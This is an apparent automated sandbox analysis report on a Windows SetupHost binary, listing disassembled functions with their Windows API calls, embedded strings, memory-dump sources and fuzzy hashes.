                                                                                                                                                                                                                • API ID: Process$CloseHandleTerminate$CodeCreateErrorExitLastObjectSingleWaitmemset
                                                                                                                                                                                                                • String ID: D
                                                                                                                                                                                                                • API String ID: 450187295-2746444292
                                                                                                                                                                                                                • Opcode ID: 471dbe3c14f667805547ce696081330520b0e8e6ea27b62882e8613876c6edf0
                                                                                                                                                                                                                • Instruction ID: 37563f720fd70b77f65d1dcd81fde08c2861238efacb1460b75b48a09a8350a0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 471dbe3c14f667805547ce696081330520b0e8e6ea27b62882e8613876c6edf0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA319E71208301ABC710EF659D88AEFBBECEF8C764F10492CFA5596251DF34C906CA92
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,009E7289,?,00000000,?,009E76BB,?,?,?,?), ref: 009E867A
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,?,009E76BB,?,?,?,?), ref: 009E8681
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00073CB0,?,00000000,?,009E76BB,?,?,?,?), ref: 009E86A6
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,?,009E76BB,?,?,?,?), ref: 009E86AD
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000000,?,009E76BB,?,?,?,?), ref: 009E86DE
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,?,009E76BB,?,?,?,?), ref: 009E86F6
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009E8745
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009E8753
                                                                                                                                                                                                                • SetLastError.KERNEL32(8007000E,00000000,00000793,8007000E,?,00000000,?,009E76BB,?,?,?,?), ref: 009E876F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Error$Heap$Last$AllocProcessStatus
                                                                                                                                                                                                                • String ID: InitLZMSDecompression
                                                                                                                                                                                                                • API String ID: 2718315141-422173697
                                                                                                                                                                                                                • Opcode ID: 79353c0672bc90fa60f75fb6134d15775cf0aacb68d6240aa9e2d557073a7ab7
                                                                                                                                                                                                                • Instruction ID: 4e945c5268937f18b2adf81827a2ce88f18bca7ed8e85dd37cc66d3961fb5856
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79353c0672bc90fa60f75fb6134d15775cf0aacb68d6240aa9e2d557073a7ab7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A721C8769047A16BD32397E79D0CBAB29A5BB40761F254564F90CEB250EF39CC0187E0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000001,ntdll.dll,?), ref: 009BD31F
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,EtwEventRegister), ref: 009BD33E
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,EtwEventUnregister), ref: 009BD351
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,EtwEventEnabled), ref: 009BD364
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,EtwEventWrite), ref: 009BD377
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                • String ID: EtwEventEnabled$EtwEventRegister$EtwEventUnregister$EtwEventWrite$ntdll.dll
                                                                                                                                                                                                                • API String ID: 667068680-1838325978
                                                                                                                                                                                                                • Opcode ID: bfcde00faf5352b2216aff30d86f689998bc03fe13f6f23ea7ec6a90dbaf4be3
                                                                                                                                                                                                                • Instruction ID: c7d67e36144f6fa342fdbfed387bda936ab6b14ea92c9c4675ad819352f2aca9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bfcde00faf5352b2216aff30d86f689998bc03fe13f6f23ea7ec6a90dbaf4be3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF11C070902364EBCB11DFE1BE096CD7BB9E748B05B10812EF505E22A5E3B14A43DB91
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000208,00000001,?,00000000,00000000,?,009FD06C,00000000,00000001,?,00000000), ref: 009FD489
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,009FD06C,00000000,00000001,?,00000000), ref: 009FD490
                                                                                                                                                                                                                • GetVolumePathNameW.KERNEL32(00000000,00000000,00000104), ref: 009FD4A9
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000208,?,009FD06C,00000000,00000001,?,00000000), ref: 009FD4B9
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,009FD06C,00000000,00000001,?,00000000), ref: 009FD4C0
                                                                                                                                                                                                                • GetVolumeNameForVolumeMountPointW.KERNEL32(00000000,00000000,00000104), ref: 009FD4D3
                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 009FD513
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,009FD06C,00000000,00000001,?,00000000), ref: 009FD51F
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,009FD06C), ref: 009FD526
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,009FD06C,00000000,00000001,?,00000000), ref: 009FD532
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,009FD06C), ref: 009FD539
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Volume$AllocFreeName$CreateFileMountPathPoint
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3263072909-0
                                                                                                                                                                                                                • Opcode ID: fea8ff3b565e9cfe72258326c43600fb2e38c08d95eca3678ca602f8857ea109
                                                                                                                                                                                                                • Instruction ID: 5282159214b07e90ce1dee99b6c5700d9098d2492dff90c2fe2a0eb274877640
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fea8ff3b565e9cfe72258326c43600fb2e38c08d95eca3678ca602f8857ea109
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B021CA71605300BBD7219BB49C4EFBF3A7DEF8AB55F04861CFA06D7294DAB099028360
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009E9AC6
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009E9ADE
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009E9B3A
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009E9B50
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009E9B89
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009E9B97
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?), ref: 009E9C09
                                                                                                                                                                                                                • HeapReAlloc.KERNEL32(00000000,?,?), ref: 009E9C10
                                                                                                                                                                                                                  • Part of subcall function 009E7252: SetLastError.KERNEL32(00000057,?,00000000,?,009E76BB,?,?,?,?), ref: 009E7275
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Error$Last$HeapStatus$AllocProcess
                                                                                                                                                                                                                • String ID: DecodeChunk
                                                                                                                                                                                                                • API String ID: 119263187-3822601451
                                                                                                                                                                                                                • Opcode ID: 55ddfd4cf5606b0e07d8db6a0069546badb6c91881ed902daad5eed3080d57cb
                                                                                                                                                                                                                • Instruction ID: 8b7774a92df2dc166bc91640ea2516dc2f458c17e321e85865dac0d451c345de
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55ddfd4cf5606b0e07d8db6a0069546badb6c91881ed902daad5eed3080d57cb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F51F3716042859BDB12DFABD988BAA77BAFFC4310B2541A9EC49CB356DB30DC01CB50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009BE2CF: GetFileAttributesW.KERNEL32(00000000,?,00000000,00000000,009C076D,?,00000000,00000000,00000000,009DE497,?,00000000), ref: 009BE2F1
                                                                                                                                                                                                                  • Part of subcall function 009BE2CF: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 009BE321
                                                                                                                                                                                                                  • Part of subcall function 009BE2CF: HeapFree.KERNEL32(00000000,?,00000000), ref: 009BE328
                                                                                                                                                                                                                  • Part of subcall function 009BE2CF: SetLastError.KERNEL32(00000000,?,00000000), ref: 009BE32F
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009EB87C
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009EB88A
                                                                                                                                                                                                                • SetLastError.KERNEL32(0000000E,?,?,00000000), ref: 009EB8A4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000000,009EB790,00000000,00000000,00000000,00000000,009DF018,?,?,?,00000000), ref: 009EB8C8
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 009EB8CF
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009EB90E
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009EB91C
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057,00000000,00000000,00000000,009DF018,?,?,?,00000000), ref: 009EB941
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000), ref: 009EB94F
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009EB956
                                                                                                                                                                                                                  • Part of subcall function 009FD024: GetLastError.KERNEL32(00000000,00000001,?,00000000), ref: 009FD073
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Error$Heap$LastStatus$Process$Free$AllocAttributesFile
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 769725385-0
                                                                                                                                                                                                                • Opcode ID: d449cdec6fb32b0055e13b5995823941354a32d79606056477d99554ef00dce9
                                                                                                                                                                                                                • Instruction ID: 762fe807a3af00e5821ee6e5fd3cec02fdf19e3be4bb5206d6e6de0c07b286e6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d449cdec6fb32b0055e13b5995823941354a32d79606056477d99554ef00dce9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F31F032A012A5ABD722DFA6CC88BAF7ABDEF94355F044065FA05E7351CB34CD0186A0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • BUCL::Rtl::Add<SIZE_T>(DataLength, OldLength, TempSize), xrefs: 009DBA12
                                                                                                                                                                                                                • onecore\base\lstring\lblob.cpp, xrefs: 009DB827, 009DBA1F
                                                                                                                                                                                                                • RtlWriteDataIntoSmartLBlobWritingContext, xrefs: 009DB834, 009DBA27
                                                                                                                                                                                                                • Not-null check failed: Data, xrefs: 009DB81A
                                                                                                                                                                                                                • ::RtlIsLBlobValid(Data), xrefs: 009DB859
                                                                                                                                                                                                                • Not-null check failed: Context, xrefs: 009DB86F
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: ::RtlIsLBlobValid(Data)$BUCL::Rtl::Add<SIZE_T>(DataLength, OldLength, TempSize)$Not-null check failed: Context$Not-null check failed: Data$RtlWriteDataIntoSmartLBlobWritingContext$onecore\base\lstring\lblob.cpp
                                                                                                                                                                                                                • API String ID: 0-2190641580
                                                                                                                                                                                                                • Opcode ID: bd6f551a71f7cfb054f86e5f8f27a20f4def27fc34af055c12445d022ed5047b
                                                                                                                                                                                                                • Instruction ID: 9ed425709e8d590c60624a98ae9c565bf75550ae5ab76ec7f8cfcfe708c7558e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd6f551a71f7cfb054f86e5f8f27a20f4def27fc34af055c12445d022ed5047b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25715875648741CFC720CF28C494A2ABBE6FFC4318F268A1EE49647351DB35E849CB92
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 009FF223
                                                                                                                                                                                                                • memset.MSVCRT ref: 009FF236
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?), ref: 009FF323
                                                                                                                                                                                                                • UnmapViewOfFile.KERNEL32(?,?,?,009844E0,009844A8,00000000,<unknown>,WdsLogStructuredException,?,00000000), ref: 009FF394
                                                                                                                                                                                                                  • Part of subcall function 009FEF6D: memset.MSVCRT ref: 009FEF95
                                                                                                                                                                                                                  • Part of subcall function 009FEF6D: GetTempFileNameW.KERNEL32(C:\$Windows.~WS\Sources\Panther\,mnd,00000000,?), ref: 009FEFB5
                                                                                                                                                                                                                  • Part of subcall function 009FF038: GetCurrentThreadId.KERNEL32(?,C0000000,00000000,00000000,00000002,00000100,00000000,00A125D0,00000030,009FF27C,?,?,?), ref: 009FF09D
                                                                                                                                                                                                                  • Part of subcall function 009FF038: GetCurrentProcessId.KERNEL32(00000000,00000000,?,00000000,00000000,?,C0000000,00000000,00000000,00000002,00000100,00000000,00A125D0,00000030,009FF27C,?), ref: 009FF0BA
                                                                                                                                                                                                                  • Part of subcall function 009FF038: GetCurrentProcess.KERNEL32(00000000,?,C0000000,00000000,00000000,00000002,00000100,00000000,00A125D0,00000030,009FF27C,?,?,?), ref: 009FF0C1
                                                                                                                                                                                                                  • Part of subcall function 009FF038: GetFileSize.KERNEL32(00000000,?,?,C0000000,00000000,00000000,00000002,00000100,00000000,00A125D0,00000030,009FF27C,?,?,?), ref: 009FF0E1
                                                                                                                                                                                                                  • Part of subcall function 009FF038: CreateFileMappingW.KERNEL32 ref: 009FF0F8
                                                                                                                                                                                                                  • Part of subcall function 009FF038: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,C0000000,00000000,00000000,00000002,00000100,00000000,00A125D0,00000030,009FF27C,?), ref: 009FF10B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • Exception (code 0x%08X: %s) occurred at 0x%p in %s (+%p). Minidump attached (%d bytes) to diagerr.xml and %s., xrefs: 009FF2FB
                                                                                                                                                                                                                • Exception (code 0x%08X: %s) occurred at 0x%p in %s (+%p)., xrefs: 009FF309
                                                                                                                                                                                                                • WdsLogStructuredException, xrefs: 009FF337
                                                                                                                                                                                                                • <unknown>, xrefs: 009FF1EE, 009FF33C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$Currentmemset$ProcessView$CreateErrorLastMappingNameSizeTempThreadUnmap
                                                                                                                                                                                                                • String ID: <unknown>$Exception (code 0x%08X: %s) occurred at 0x%p in %s (+%p).$Exception (code 0x%08X: %s) occurred at 0x%p in %s (+%p). Minidump attached (%d bytes) to diagerr.xml and %s.$WdsLogStructuredException
                                                                                                                                                                                                                • API String ID: 843016236-142550930
                                                                                                                                                                                                                • Opcode ID: ced52251de4610566fa3d55aee3e82261a9b9759942004492aac922755a7358b
                                                                                                                                                                                                                • Instruction ID: 0bd1903556d85f090cd60aa44c18a92b09916f64c01b7c5d4bf9a1bf3ff66229
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ced52251de4610566fa3d55aee3e82261a9b9759942004492aac922755a7358b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A512FB5A0022C9FCB60DF64CC85BEDB7B9AF48314F5041E9A609A7291DB709E85CF64
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: strchr$_errno_set_errnostrncpy_sstrtol
                                                                                                                                                                                                                • String ID: 0$A
                                                                                                                                                                                                                • API String ID: 3470324278-723102754
                                                                                                                                                                                                                • Opcode ID: 32e14e255ab1ee2eddf527050b32ce01cc9854a4462c036488925fb0d1951ef7
                                                                                                                                                                                                                • Instruction ID: accf5d92226a7a456ff4009bef8c915a315d076871b14318b862bef532bb2994
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32e14e255ab1ee2eddf527050b32ce01cc9854a4462c036488925fb0d1951ef7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07415436A4A20A9FDF348BAC99493FEBBBEEB97300F140417D540A7155DE7088878BD1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009C0DBA: HeapAlloc.KERNEL32(?,00000008,00000001,00000000,00000000,00000000,009BE9B6,?,009BE738,009BE360,00000000), ref: 009C0E57
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 009C08FC
                                                                                                                                                                                                                • SetLastError.KERNEL32(000004C7), ref: 009C0925
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000010,?,00000000), ref: 009C099F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009C09B2
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009C09B9
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009C09C1
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 009C09D0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • CopyDirectoryDirCallback: The copy was canceled by the user., xrefs: 009C0909
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Heap$AllocFreeObjectProcessSingleWait
                                                                                                                                                                                                                • String ID: CopyDirectoryDirCallback: The copy was canceled by the user.
                                                                                                                                                                                                                • API String ID: 3949338158-1142974027
                                                                                                                                                                                                                • Opcode ID: 05aa37e8721197452ac22a5871a3dbcd1f7d4b1831d3518dff71aed62c228b2b
                                                                                                                                                                                                                • Instruction ID: 681a71660e73c28d51614cde36f6b95e7960c3c00b8c9b3e706cc0a96aa77bf2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05aa37e8721197452ac22a5871a3dbcd1f7d4b1831d3518dff71aed62c228b2b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81315031A04700EBEB20DFA5C989F9E77B9EBC9710F14891DF55A862A2D770EC41CB52
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 009B847E
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 009B8509
                                                                                                                                                                                                                  • Part of subcall function 009B858F: __EH_prolog3.LIBCMT ref: 009B8596
                                                                                                                                                                                                                  • Part of subcall function 009B858F: SysFreeString.OLEAUT32(00000000), ref: 009B86B4
                                                                                                                                                                                                                  • Part of subcall function 009B858F: GetProcessHeap.KERNEL32(00000000,00000000), ref: 009B86C1
                                                                                                                                                                                                                  • Part of subcall function 009B858F: HeapFree.KERNEL32(00000000), ref: 009B86C8
                                                                                                                                                                                                                • CompareStringW.KERNEL32(00000409,00000001,True,000000FF,?,000000FF,00000000,?,00000008,009AB68A,DIAGNOSTICANALYSISENABLED,?), ref: 009B84E5
                                                                                                                                                                                                                • CompareStringW.KERNEL32(00000409,00000001,False,000000FF,?,000000FF), ref: 009B852A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • False, xrefs: 009B851E
                                                                                                                                                                                                                • True, xrefs: 009B84D9
                                                                                                                                                                                                                • OneSettings: Invalid boolean value [%s] for setting [%s]., xrefs: 009B8544
                                                                                                                                                                                                                • CMoSetupOneSettingsHelperT<class CEmptyType>::GetSettingAsBool, xrefs: 009B84A3, 009B857A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: String$Free$CompareH_prolog3Heap$Process
                                                                                                                                                                                                                • String ID: CMoSetupOneSettingsHelperT<class CEmptyType>::GetSettingAsBool$False$OneSettings: Invalid boolean value [%s] for setting [%s].$True
                                                                                                                                                                                                                • API String ID: 2740677072-1972830817
                                                                                                                                                                                                                • Opcode ID: 392883236d0c0dede5456d745f86eeb3f0b08fd42f560c09c08a250ad8c3301f
                                                                                                                                                                                                                • Instruction ID: be2d640096ec730a8b83facdc7d4a83ca123ce33620d1c61b917e66ee6d10d2b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 392883236d0c0dede5456d745f86eeb3f0b08fd42f560c09c08a250ad8c3301f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A331C370644316ABCF24AF54CE85FEF362AAB88730F148618BA246F3D1CEB49D01C751
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,009E71FB), ref: 009E859E
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,009E71FB), ref: 009E85A5
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000000,009E71FB), ref: 009E85D6
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000000,009E71FB), ref: 009E85EE
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009E863D
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009E864B
                                                                                                                                                                                                                • SetLastError.KERNEL32(8007000E,00000000,00000771,8007000E,?,00000000,009E71FB), ref: 009E8667
